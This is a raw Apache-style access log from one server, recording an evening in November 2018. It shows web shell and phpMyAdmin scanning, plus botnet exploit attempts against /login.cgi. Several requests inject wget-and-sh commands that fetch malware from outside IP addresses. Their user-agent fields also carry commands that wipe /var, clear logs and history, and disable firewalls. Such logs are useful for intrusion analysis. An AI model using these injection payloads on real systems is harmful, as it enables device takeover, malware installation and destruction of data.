132.232.51.137 - - [01/Nov/2018:19:59:02 +0100] "POST /cmd.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:19:59:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:19:59:30 +0100] "POST /bak.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:59:50 +0100] "POST /system.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:20:00:10 +0100] "POST /l6.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:20:00:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:20:00:38 +0100] "POST /l7.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:20:00:43 +0100] "POST /l8.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:20:01:19 +0100] "POST /q.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:20:01:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:20:02:11 +0100] "POST /mz.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:20:02:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:20:03:22 +0100] "POST /xx.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:20:03:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:20:03:24 +0100] "POST /yumo.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:20:03:27 +0100] "POST /min.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:20:03:58 +0100] "POST /wan.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
197.53.249.109 - - [01/Nov/2018:20:04:17 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
156.197.52.188 - - [01/Nov/2018:20:04:18 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:20:04:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:20:04:28 +0100] "POST /wanan.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:20:04:40 +0100] "POST /ssaa.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:20:04:41 +0100] "POST /qq.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:20:04:50 +0100] "POST /aw.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:20:04:52 +0100] "POST /12.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:20:04:55 +0100] "POST /hh.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:20:04:58 +0100] "POST /ak.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:20:05:06 +0100] "POST /ip.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:20:05:07 +0100] "POST /infoo.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:20:05:18 +0100] "POST /qq.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:20:05:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:20:05:34 +0100] "POST /qwe.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:20:05:54 +0100] "POST /1213.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:20:05:58 +0100] "POST /post.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:20:06:18 +0100] "POST /h1.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:20:06:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:20:06:47 +0100] "POST /test.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:20:07:23 +0100] "POST /3.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:20:07:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:20:07:29 +0100] "POST /phpinfi.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:20:07:51 +0100] "POST /aaaa.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
41.38.151.11 - - [01/Nov/2018:20:08:06 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.244.25.131/bins.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Nov/2018:20:08:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:20:09:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:20:09:26 +0100] "POST /sean.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:20:10:03 +0100] "POST /app.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:20:10:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:20:10:27 +0100] "POST /help.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:20:10:49 +0100] "POST /tiandi.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:20:11:06 +0100] "POST /miao.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:20:11:22 +0100] "POST /xz.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:20:11:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
177.188.250.27 - - [01/Nov/2018:20:11:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
37.6.128.1 - - [01/Nov/2018:20:11:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:11:46 +0100] "POST /linuxse.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:20:11:51 +0100] "POST /zuoindex.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:20:12:14 +0100] "POST /zshmindex.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:20:12:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:20:12:30 +0100] "POST /tomcat.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:20:13:06 +0100] "POST /ceshi.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:20:13:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.70.168.71 - - [01/Nov/2018:20:13:29 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://148.72.176.78/ken.sh%20-O%20-%3E%20/tmp/ken.sh;sh%20/tmp/ken.sh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
132.232.51.137 - - [01/Nov/2018:20:13:38 +0100] "POST /1hou.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
45.232.153.246 - - [01/Nov/2018:20:13:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:13:58 +0100] "POST /ou2.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:20:14:20 +0100] "POST /zuos.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:20:14:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:20:15:19 +0100] "POST /zuoss.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:20:15:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:20:15:58 +0100] "POST /zuoshss.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:20:16:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:20:16:35 +0100] "POST /boots.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
175.184.8.165 - - [01/Nov/2018:20:16:50 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://206.189.165.45/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
42.150.46.200 - - [01/Nov/2018:20:16:56 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.111.168/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
132.232.51.137 - - [01/Nov/2018:20:17:08 +0100] "POST /she.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
61.198.115.253 - - [01/Nov/2018:20:17:11 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://76.74.177.230/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:20:17:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:20:18:06 +0100] "GET /index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:20:18:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:20:18:26 +0100] "GET /phpmyadmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:18:30 +0100] "GET /phpMyAdmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:18:31 +0100] "GET /pmd/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:18:50 +0100] "GET /pma/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:19:02 +0100] "GET /PMA/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
124.142.45.68 - - [01/Nov/2018:20:19:10 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://76.74.177.230/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
41.45.62.223 - - [01/Nov/2018:20:19:20 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
132.232.51.137 - - [01/Nov/2018:20:19:22 +0100] "GET /PMA2/index.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:20:19:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:20:19:32 +0100] "GET /pmamy/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:19:39 +0100] "GET /pmamy2/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:19:40 +0100] "GET /mysql/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:19:42 +0100] "GET /admin/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:19:47 +0100] "GET /db/index.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:20:06 +0100] "GET /web/phpMyAdmin/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:20:21 +0100] "GET /admin/pma/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:20:20:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
41.234.248.222 - - [01/Nov/2018:20:20:24 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
132.232.51.137 - - [01/Nov/2018:20:20:26 +0100] "GET /admin/PMA/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:20:54 +0100] "GET /admin/mysql/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:21:19 +0100] "GET /admin/mysql2/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:20:21:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:20:21:38 +0100] "GET /admin/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:22:18 +0100] "GET /phpAdmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:20:22:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:20:22:30 +0100] "GET /phpmyadmin0/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:22:43 +0100] "GET /phpmyadmin1/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:22:59 +0100] "GET /phpmyadmin2/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:23:14 +0100] "GET /phpMyAdmin-4.4.0/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:23:19 +0100] "GET /myadmin/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:23:20 +0100] "GET /myadmin2/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:20:23:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:20:23:30 +0100] "GET /xampp/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:23:30 +0100] "GET /phpMyadmin_bak/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:23:34 +0100] "GET /www/phpMyAdmin/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:23:42 +0100] "GET /tools/phpMyAdmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:23:42 +0100] "GET /phpmyadmin-old/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
